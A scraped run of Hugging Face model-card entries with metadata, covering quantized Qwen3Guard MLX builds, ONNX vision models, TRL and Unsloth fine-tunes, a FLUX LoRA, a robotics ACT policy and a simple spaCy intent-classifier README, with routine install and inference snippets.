Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well.
Step 1: Clone llama.cpp from GitHub.
```
git clone https://github.com/ggerganov/llama.cpp
```
Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux).
```
cd llama.cpp && LLAMA_CURL=1 make
```
Step 3: Run inference through the main binary.
```
./llama-cli --hf-repo harborwater/LFM2-2.6B-Q4_K_M-GGUF --hf-file lfm2-2.6b-q4_k_m.gguf -p "The meaning to life and the universe is"
```
or
```
./llama-server --hf-repo harborwater/LFM2-2.6B-Q4_K_M-GGUF --hf-file lfm2-2.6b-q4_k_m.gguf -c 2048
```
|
NexVeridian/Qwen3Guard-Gen-4B-6bit
|
NexVeridian
| 2025-09-23T17:44:37Z | 0 | 0 |
mlx
|
[
"mlx",
"safetensors",
"qwen3",
"text-generation",
"conversational",
"base_model:Qwen/Qwen3Guard-Gen-4B",
"base_model:quantized:Qwen/Qwen3Guard-Gen-4B",
"license:apache-2.0",
"6-bit",
"region:us"
] |
text-generation
| 2025-09-23T17:42:54Z |
---
library_name: mlx
license: apache-2.0
license_link: https://huggingface.co/Qwen/Qwen3Guard-Gen-4B/blob/main/LICENSE
pipeline_tag: text-generation
base_model: Qwen/Qwen3Guard-Gen-4B
tags:
- mlx
---
# NexVeridian/Qwen3Guard-Gen-4B-6bit
This model [NexVeridian/Qwen3Guard-Gen-4B-6bit](https://huggingface.co/NexVeridian/Qwen3Guard-Gen-4B-6bit) was
converted to MLX format from [Qwen/Qwen3Guard-Gen-4B](https://huggingface.co/Qwen/Qwen3Guard-Gen-4B)
using mlx-lm version **0.28.0**.
## Use with mlx
```bash
pip install mlx-lm
```
```python
from mlx_lm import load, generate
model, tokenizer = load("NexVeridian/Qwen3Guard-Gen-4B-6bit")
prompt = "hello"
if tokenizer.chat_template is not None:
messages = [{"role": "user", "content": prompt}]
prompt = tokenizer.apply_chat_template(
messages, add_generation_prompt=True
)
response = generate(model, tokenizer, prompt=prompt, verbose=True)
```
|
onnxmodelzoo/seresnet50_Opset16
|
onnxmodelzoo
| 2025-09-23T17:44:04Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:43:53Z |
---
language: en
license: apache-2.0
model_name: seresnet50_Opset16.onnx
tags:
- Computer_Vision
---
|
MohamedAhmedAE/Llama-3.2-1B-Instruct-Medical-Finetune-v4
|
MohamedAhmedAE
| 2025-09-23T17:43:47Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"trl",
"sft",
"base_model:meta-llama/Llama-3.2-1B-Instruct",
"base_model:finetune:meta-llama/Llama-3.2-1B-Instruct",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T17:29:19Z |
---
base_model: meta-llama/Llama-3.2-1B-Instruct
library_name: transformers
model_name: Llama-3.2-1B-Instruct-Medical-Finetune-v4
tags:
- generated_from_trainer
- trl
- sft
licence: license
---
# Model Card for Llama-3.2-1B-Instruct-Medical-Finetune-v4
This model is a fine-tuned version of [meta-llama/Llama-3.2-1B-Instruct](https://huggingface.co/meta-llama/Llama-3.2-1B-Instruct).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="MohamedAhmedAE/Llama-3.2-1B-Instruct-Medical-Finetune-v4", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/mohamed-ahmed/Llama-3.2-1B-Instruct-Medical-Finetune-v4/runs/7pmf3z1d)
This model was trained with SFT.
### Framework versions
- TRL: 0.21.0
- Transformers: 4.55.4
- Pytorch: 2.8.0
- Datasets: 3.6.0
- Tokenizers: 0.21.4
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
onnxmodelzoo/seresnet33ts_Opset16
|
onnxmodelzoo
| 2025-09-23T17:43:44Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:43:35Z |
---
language: en
license: apache-2.0
model_name: seresnet33ts_Opset16.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/seresnet152d_Opset17
|
onnxmodelzoo
| 2025-09-23T17:43:35Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:43:14Z |
---
language: en
license: apache-2.0
model_name: seresnet152d_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/seresnet152d_Opset16
|
onnxmodelzoo
| 2025-09-23T17:43:13Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:42:53Z |
---
language: en
license: apache-2.0
model_name: seresnet152d_Opset16.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/sequencer2d_l_Opset16
|
onnxmodelzoo
| 2025-09-23T17:42:04Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:41:39Z |
---
language: en
license: apache-2.0
model_name: sequencer2d_l_Opset16.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/semnasnet_075_Opset17
|
onnxmodelzoo
| 2025-09-23T17:40:24Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:40:19Z |
---
language: en
license: apache-2.0
model_name: semnasnet_075_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/selecsls60_Opset18
|
onnxmodelzoo
| 2025-09-23T17:39:33Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:39:21Z |
---
language: en
license: apache-2.0
model_name: selecsls60_Opset18.onnx
tags:
- Computer_Vision
---
|
NexVeridian/Qwen3Guard-Gen-4B-3bit
|
NexVeridian
| 2025-09-23T17:39:28Z | 0 | 0 |
mlx
|
[
"mlx",
"safetensors",
"qwen3",
"text-generation",
"conversational",
"base_model:Qwen/Qwen3Guard-Gen-4B",
"base_model:quantized:Qwen/Qwen3Guard-Gen-4B",
"license:apache-2.0",
"3-bit",
"region:us"
] |
text-generation
| 2025-09-23T17:38:20Z |
---
library_name: mlx
license: apache-2.0
license_link: https://huggingface.co/Qwen/Qwen3Guard-Gen-4B/blob/main/LICENSE
pipeline_tag: text-generation
base_model: Qwen/Qwen3Guard-Gen-4B
tags:
- mlx
---
# NexVeridian/Qwen3Guard-Gen-4B-3bit
This model [NexVeridian/Qwen3Guard-Gen-4B-3bit](https://huggingface.co/NexVeridian/Qwen3Guard-Gen-4B-3bit) was
converted to MLX format from [Qwen/Qwen3Guard-Gen-4B](https://huggingface.co/Qwen/Qwen3Guard-Gen-4B)
using mlx-lm version **0.28.0**.
## Use with mlx
```bash
pip install mlx-lm
```
```python
from mlx_lm import load, generate
model, tokenizer = load("NexVeridian/Qwen3Guard-Gen-4B-3bit")
prompt = "hello"
if tokenizer.chat_template is not None:
messages = [{"role": "user", "content": prompt}]
prompt = tokenizer.apply_chat_template(
messages, add_generation_prompt=True
)
response = generate(model, tokenizer, prompt=prompt, verbose=True)
```
|
onnxmodelzoo/sebotnet33ts_256_Opset16
|
onnxmodelzoo
| 2025-09-23T17:38:10Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:38:02Z |
---
language: en
license: apache-2.0
model_name: sebotnet33ts_256_Opset16.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/rexnet_200_Opset17
|
onnxmodelzoo
| 2025-09-23T17:38:02Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:37:53Z |
---
language: en
license: apache-2.0
model_name: rexnet_200_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/rexnet_200_Opset16
|
onnxmodelzoo
| 2025-09-23T17:37:53Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:37:44Z |
---
language: en
license: apache-2.0
model_name: rexnet_200_Opset16.onnx
tags:
- Computer_Vision
---
|
Jeganmurali/OrpheusTamil
|
Jeganmurali
| 2025-09-23T17:37:34Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"text-generation-inference",
"unsloth",
"llama",
"trl",
"en",
"base_model:unsloth/orpheus-3b-0.1-ft",
"base_model:finetune:unsloth/orpheus-3b-0.1-ft",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T17:36:59Z |
---
base_model: unsloth/orpheus-3b-0.1-ft
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- trl
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** Jeganmurali
- **License:** apache-2.0
- **Finetuned from model :** unsloth/orpheus-3b-0.1-ft
This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
onnxmodelzoo/rexnet_130_Opset16
|
onnxmodelzoo
| 2025-09-23T17:37:23Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:37:17Z |
---
language: en
license: apache-2.0
model_name: rexnet_130_Opset16.onnx
tags:
- Computer_Vision
---
|
Josemv20/prueba2
|
Josemv20
| 2025-09-23T17:37:10Z | 0 | 0 |
diffusers
|
[
"diffusers",
"text-to-image",
"lora",
"template:diffusion-lora",
"base_model:black-forest-labs/FLUX.1-dev",
"base_model:adapter:black-forest-labs/FLUX.1-dev",
"region:us"
] |
text-to-image
| 2025-09-23T17:36:47Z |
---
tags:
- text-to-image
- lora
- diffusers
- template:diffusion-lora
widget:
- output:
url: images/2.png
text: >-
4K, HD, high resolution, masterpiece, best quality, face, best quality,
masterpiece, official screencap, source_screencap, official style, blaash,
tmosth, flat color, black shading, sloppy coloring, hatching \(texture\), ,
krekkov, 1girl, skindentation), ((Masterpiece, best quality, shadows,
extremely detailed, intricate, solo, source_anime),
parameters:
negative_prompt: >-
realistic, semi-realistic, ultra realistic, sharp face, pale skin,
duplicate, futanari, paizuri, multiple females, extra toes, extra limbs,
extra head, floating, blurry, blurry penis, (watermark, patreon, text),
oversized penis. female off screen, female not visible, female face off
screen, multiple feet, extra toes, extra fingers, duplicate, impossible
shapes, futa, deformed tongue, deformed lip, Watermark, censored,
deformed, bad anatomy, disfigured, poorly drawn face, mutated, extra limb,
ugly, poorly drawn hands, missing limb, floating limbs, disconnected
limbs, disconnected head, malformed hands, long neck, mutated hands and
fingers, bad hands, missing fingers, cropped, worst quality, low quality,
mutation, poorly drawn, huge calf, bad hands, fused hand, missing hand,
disappearing arms, disappearing thigh, disappearing calf, disappearing
legs, missing fingers, fused fingers, abnormal eye proportion, Abnormal
hands, abnormal legs, abnormal feet, abnormal fingers, muscular female,
big shoulders,
base_model: black-forest-labs/FLUX.1-dev
instance_prompt: null
---
# prueba2
<Gallery />
## Download model
[Download](/Josemv20/prueba2/tree/main) them in the Files & versions tab.
|
phospho-app/ACT-Marker_pickup_piper-0zn73t37mb
|
phospho-app
| 2025-09-23T17:35:12Z | 0 | 0 |
phosphobot
|
[
"phosphobot",
"safetensors",
"act",
"robotics",
"dataset:LegrandFrederic/Marker_pickup_piper",
"region:us"
] |
robotics
| 2025-09-23T14:55:21Z |
---
datasets: LegrandFrederic/Marker_pickup_piper
library_name: phosphobot
pipeline_tag: robotics
model_name: act
tags:
- phosphobot
- act
task_categories:
- robotics
---
# act model - 🧪 phosphobot training pipeline
- **Dataset**: [LegrandFrederic/Marker_pickup_piper](https://huggingface.co/datasets/LegrandFrederic/Marker_pickup_piper)
- **Wandb run id**: None
## This model was trained using **[🧪phospho](https://phospho.ai)**
Training was successful, try it out on your robot!
## Training parameters
```text
{
"batch_size": 60,
"steps": 8000,
"save_freq": 5000
}
```
📖 **Get Started**: [docs.phospho.ai](https://docs.phospho.ai?utm_source=huggingface_readme)
🤖 **Get your robot**: [robots.phospho.ai](https://robots.phospho.ai?utm_source=huggingface_readme)
|
SkieyFly/pi05-so101_block_to_container_all-state_tokens_1-interval_32-rand
|
SkieyFly
| 2025-09-23T17:34:43Z | 0 | 0 | null |
[
"safetensors",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:31:26Z |
---
license: apache-2.0
---
|
arthinfinity/Qwen2.5-0.5B-Instruct-Gensyn-Swarm-stubby_melodic_eel
|
arthinfinity
| 2025-09-23T17:29:14Z | 75 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen2",
"text-generation",
"rl-swarm",
"genrl-swarm",
"grpo",
"gensyn",
"I am stubby_melodic_eel",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-22T03:33:31Z |
---
library_name: transformers
tags:
- rl-swarm
- genrl-swarm
- grpo
- gensyn
- I am stubby_melodic_eel
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
jq/qwen3-32b-sunflower-20250923
|
jq
| 2025-09-23T17:27:16Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"text-generation-inference",
"unsloth",
"qwen3",
"trl",
"en",
"base_model:jq/sunflower-32b-pretrained",
"base_model:finetune:jq/sunflower-32b-pretrained",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T17:26:59Z |
---
base_model: jq/sunflower-32b-pretrained
tags:
- text-generation-inference
- transformers
- unsloth
- qwen3
- trl
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** jq
- **License:** apache-2.0
- **Finetuned from model :** jq/sunflower-32b-pretrained
This qwen3 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
KairoNet/Auranet_K6
|
KairoNet
| 2025-09-23T17:22:56Z | 0 | 0 | null |
[
"safetensors",
"any-to-any",
"omega",
"omegalabs",
"bittensor",
"agi",
"license:mit",
"region:us"
] |
any-to-any
| 2025-09-22T18:43:37Z |
---
license: mit
tags:
- any-to-any
- omega
- omegalabs
- bittensor
- agi
---
This is an Any-to-Any model checkpoint for the OMEGA Labs x Bittensor Any-to-Any subnet.
Check out the [git repo](https://github.com/omegalabsinc/omegalabs-anytoany-bittensor) and find OMEGA on X: [@omegalabsai](https://x.com/omegalabsai).
|
alixagari2000/LLMsimplified
|
alixagari2000
| 2025-09-23T17:22:36Z | 0 | 0 | null |
[
"license:apache-2.0",
"region:us"
] | null | 2025-09-22T23:14:28Z |
---
license: apache-2.0
---
This script is a very simple version of a language model-based chatbot, sometimes referred to as a mini LLM (though it’s not really a language model in the true sense). It uses pre-trained word embeddings from spaCy and Logistic Regression from scikit-learn to classify user input into a small number of predefined categories (called "intents").
🔍 Detailed Explanation
1. Importing Libraries
import spacy
from sklearn.linear_model import LogisticRegression
import numpy as np
spacy: Used to process text and convert it into word vectors using a pre-trained language model (en_core_web_md).
LogisticRegression: A simple ML classifier from scikit-learn for categorizing input text into predefined labels (intents).
numpy: Used here implicitly for reshaping vectors.
2. Load the Pre-trained Language Model
nlp = spacy.load("en_core_web_md")
Loads the medium-sized English model that includes 300-dimensional word vectors.
These vectors represent semantic meaning—similar words have vectors close together.
3. Training Data
X_train = [
"hi", "Hi", "hello", "Hello", "helo", ...
]
y_train = [
"greet", "greet", "greet", ...
]
X_train: A list of example user inputs (utterances).
y_train: A list of corresponding intents (categories) for each input.
3 intents here:
"greet" – greetings
"intro" – self-introduction
"bye" – goodbyes
📌 Note: This is a form of intent classification, a core component of many conversational agents.
4. Convert Sentences to Vectors
X_vectors = [nlp(text).vector for text in X_train]
Each sentence is passed through the spaCy model, which returns a 300-dimensional vector representing the sentence.
This vector is the mean of the word vectors in the sentence (default behavior in spaCy).
This transforms the text into a form that a machine learning model can understand (numerical data).
5. Train the Classifier
clf = LogisticRegression()
clf.fit(X_vectors, y_train)
A Logistic Regression classifier is trained to associate vectors with the correct intent (greet, intro, or bye).
Despite its name, LogisticRegression is a good baseline for multi-class classification.
6. Prediction Example
text = "yo"
vec = nlp(text).vector.reshape(1, -1)
print(clf.predict(vec)) # likely to predict "greet"
Takes a test input ("yo"), converts it to a vector, reshapes it to match the model’s expected input shape ((1, 300)), and predicts the intent.
It will likely return "greet" because "yo" is semantically close to "hi", "hello", etc.
7. Interactive Command-Line Chat Loop
if __name__ == "__main__":
...
Starts an interactive loop where users can input text and get a predicted intent.
Exits on typing "exit".
Every input is processed the same way:
Text → vector using spaCy
Vector → predicted intent using Logistic Regression
Result is printed
🧠 How This Is (and Isn't) Like a Real LLM
✅ Simple LLM-Like Component ❌ Not a Full LLM
Uses word embeddings Doesn't generate text
Performs intent classification No context tracking
Pretrained language model (spaCy) Not autoregressive
Handles basic input/output No large-scale understanding or reasoning
So while it's not an actual LLM like GPT or BERT, it uses some language model features (word vectors) to do simple NLP classification.
🧪 How You Could Extend This
To make this closer to a real chatbot:
Add more intents and training examples.
Add a get_response() function to reply meaningfully to each intent.
Use a larger model or fine-tune a transformer like BERT for better accuracy.
Add multi-turn conversation memory (context tracking).
Connect it to a GUI or messaging platform.
🔚 Summary
This script is a basic chatbot intent classifier:
Converts input into vectors using spaCy word embeddings.
Classifies into intents (greet, intro, bye) using Logistic Regression.
Responds via command line based on the predicted intent.
|
Stef7177/camembert-triathlon-coach-v3
|
Stef7177
| 2025-09-23T17:18:34Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"camembert",
"text-classification",
"arxiv:1910.09700",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-classification
| 2025-09-23T16:18:33Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
Moritz7/model_3
|
Moritz7
| 2025-09-23T17:18:02Z | 32 | 0 |
lerobot
|
[
"lerobot",
"safetensors",
"robotics",
"act",
"dataset:Moritz7/dataset-8",
"arxiv:2304.13705",
"license:apache-2.0",
"region:us"
] |
robotics
| 2025-09-19T09:46:54Z |
---
datasets: Moritz7/dataset-8
library_name: lerobot
license: apache-2.0
model_name: act
pipeline_tag: robotics
tags:
- lerobot
- robotics
- act
---
# Model Card for act
<!-- Provide a quick summary of what the model is/does. -->
[Action Chunking with Transformers (ACT)](https://huggingface.co/papers/2304.13705) is an imitation-learning method that predicts short action chunks instead of single steps. It learns from teleoperated data and often achieves high success rates.
This policy has been trained and pushed to the Hub using [LeRobot](https://github.com/huggingface/lerobot).
See the full documentation at [LeRobot Docs](https://huggingface.co/docs/lerobot/index).
---
## How to Get Started with the Model
For a complete walkthrough, see the [training guide](https://huggingface.co/docs/lerobot/il_robots#train-a-policy).
Below is the short version on how to train and run inference/eval:
### Train from scratch
```bash
lerobot-train \
--dataset.repo_id=${HF_USER}/<dataset> \
--policy.type=act \
--output_dir=outputs/train/<desired_policy_repo_id> \
--job_name=lerobot_training \
--policy.device=cuda \
--policy.repo_id=${HF_USER}/<desired_policy_repo_id>
--wandb.enable=true
```
_Writes checkpoints to `outputs/train/<desired_policy_repo_id>/checkpoints/`._
### Evaluate the policy/run inference
```bash
lerobot-record \
--robot.type=so100_follower \
--dataset.repo_id=<hf_user>/eval_<dataset> \
--policy.path=<hf_user>/<desired_policy_repo_id> \
--episodes=10
```
Prefix the dataset repo with **eval\_** and supply `--policy.path` pointing to a local or hub checkpoint.
---
## Model Details
- **License:** apache-2.0
|
Vivek-Saurabh-241562584/gemma-4B-pt-arc-2025-text
|
Vivek-Saurabh-241562584
| 2025-09-23T17:15:39Z | 0 | 0 |
transformers
|
[
"transformers",
"tensorboard",
"safetensors",
"generated_from_trainer",
"trl",
"sft",
"base_model:google/gemma-3-4b-pt",
"base_model:finetune:google/gemma-3-4b-pt",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T16:55:31Z |
---
base_model: google/gemma-3-4b-pt
library_name: transformers
model_name: gemma-4B-pt-arc-2025-text
tags:
- generated_from_trainer
- trl
- sft
licence: license
---
# Model Card for gemma-4B-pt-arc-2025-text
This model is a fine-tuned version of [google/gemma-3-4b-pt](https://huggingface.co/google/gemma-3-4b-pt).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="Vivek-Saurabh-241562584/gemma-4B-pt-arc-2025-text", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
This model was trained with SFT.
### Framework versions
- TRL: 0.15.2
- Transformers: 4.56.1
- Pytorch: 2.8.0+cu126
- Datasets: 3.3.2
- Tokenizers: 0.22.0
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallouédec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
aamijar/Llama-2-13b-hf-lora-r8-rte-epochs2
|
aamijar
| 2025-09-23T17:10:11Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T17:10:05Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
